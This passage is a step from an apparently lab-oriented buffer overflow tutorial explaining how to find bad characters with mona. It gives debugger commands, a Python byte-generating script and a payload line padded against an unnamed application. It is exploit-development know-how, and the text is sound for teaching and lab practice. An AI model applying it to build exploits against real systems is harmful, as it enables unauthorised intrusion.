6. Finding Bad Characters

Generate a bytearray using mona, and exclude the null byte (\x00) by default. Note the location of the bytearray.bin file that is generated.

!mona bytearray -b "\x00"

Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \x01 to \xff:

#!/usr/bin/env python
from __future__ import print_function

for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')

print()

Put the string of bad chars before the C's in your buffer, and adjust the number of C's to compensate:

badchars = "\x01\x02\x03\x04\x05...\xfb\xfc\xfd\xfe\xff"
payload = badchars + "C" * (600-112-4-255)

Crash the application using this buffer, and make a note of the address to which ESP points. This can change every time you crash the application, so get into the habit of copying it from the register each time.

Use the mona compare command to reference the bytearray you generated, and the address to which ESP points:

!mona compare -f C:\mona\appname\bytearray.bin -a <address>